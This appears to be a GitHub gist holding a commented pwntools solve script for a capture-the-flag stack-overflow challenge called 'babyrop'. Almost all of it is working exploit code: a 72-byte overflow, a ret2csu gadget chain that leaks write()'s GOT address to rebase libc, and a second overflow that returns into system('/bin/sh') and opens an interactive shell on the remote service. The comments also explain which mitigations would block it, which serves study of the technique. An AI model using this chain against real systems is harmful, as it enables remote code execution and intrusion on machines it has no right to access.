@Adikso
Created February 8, 2021 00:15
# Solve script for a CTF stack-overflow challenge ("babyrop"), built on pwntools.
# Flow: (1) overflow the stack buffer and chain two gadgets from the binary so
# that write() prints its own GOT entry, (2) rebase a local libc copy on that
# leak, (3) overflow again and return into system("/bin/sh").
# Every address below is hard-coded for this one binary and is not portable.
# Defender's view: the chain as written depends on the overflow reaching the
# saved return address unchecked (presumably no stack canary) and on the
# 0x0040xxxx gadget addresses being fixed (presumably a non-PIE build); either
# mitigation would break it — confirm with checksec rather than assume.
from pwn import *
r = remote('dicec.tf', 31924)
elf = ELF('babyrop')
rop = ROP(elf)  # pwntools gadget finder, only used for 'pop rdi; ret' in part 2
# The remote service is assumed to run this exact libc build; if it does not,
# the base computed from the leak below is wrong and part 2 will fail.
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc_write = libc.symbols['write']  # offset of write() inside libc
# Consume the prompt so the 8-byte read below starts at the leaked bytes.
r.readuntil('Your name: ')
# Part 1 - Obtaining libc base address
got_write = elf.symbols['got.write']  # GOT slot holding write()'s resolved address
# 72 bytes of filler reach the saved return address (offset is challenge-specific).
payload = b'A' * 72
# First gadget: six pops then ret. Together with the second gadget at
# 0x004011b0 this looks like the two halves of __libc_csu_init (the ret2csu
# pattern): the pops load the registers the second half moves into write()'s
# argument registers.
# pop rbx
# pop rbp
# pop r12
# pop r13
# pop r14
# pop r15
payload += p64(0x004011ca) # 'pop rbx', 'pop rbp', 'pop r12', 'pop r13', 'pop r14', 'pop r15', 'ret'
payload += p64(0) # rbx = 0, so the call below dereferences [r15 + 0*8] = [r15]
payload += p64(1) # rbp = 1; presumably satisfies the csu loop's rbx/rbp compare after one iteration so it exits — confirm against the disassembly
payload += p64(1) # r12 -> edi: fd 1 (stdout), the destination of the leak
payload += p64(got_write) # r13 -> rsi: buffer = the GOT slot of write
payload += p64(8) # r14 -> rdx: count, one 8-byte pointer
payload += p64(got_write) # r15: call target is [r15] = write, i.e. write(1, &got_write, 8)
# Second gadget: move r12-r14 into the argument registers and call through r15.
# mov rdx, r14
# mov rsi, r13
# mov edi, r12d
# call qword [r15 + rbx*8]
payload += p64(0x004011b0) # magic
# 56 bytes of filler for the gadget's tail after the call (presumably
# add rsp,8 plus six pops: 8 + 6*8 = 56) before its final ret.
payload += b'C' * 56
payload += p64(0x00401137) # return into main past its first instruction so the service prompts again
r.sendline(payload)
# Calculate libc address
address = u64(r.read(8))  # the 8 bytes write() emitted: write's address in the remote libc
libc.address = address - libc_write  # rebase the local libc image on the leak
log.info(f'Found write @ {hex(address)}')
log.info(f'Found libc base @ {hex(libc.address)}')
# Second prompt from the restarted main; consume it before sending part 2.
r.readuntil('Your name: ')
# Part 2 - Execute shell
pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]  # address of a 'pop rdi; ret' gadget in the binary
bin_sh = next(libc.search(b"/bin/sh\x00"))  # first "/bin/sh" string in the rebased libc
system = libc.symbols['system']  # resolved against libc.address set above
payload = b'A' * 72  # same overflow offset as part 1
payload += p64(pop_rdi)
payload += p64(bin_sh)  # rdi = "/bin/sh"
payload += p64(system)  # system(rdi)
r.sendline(payload)
r.interactive()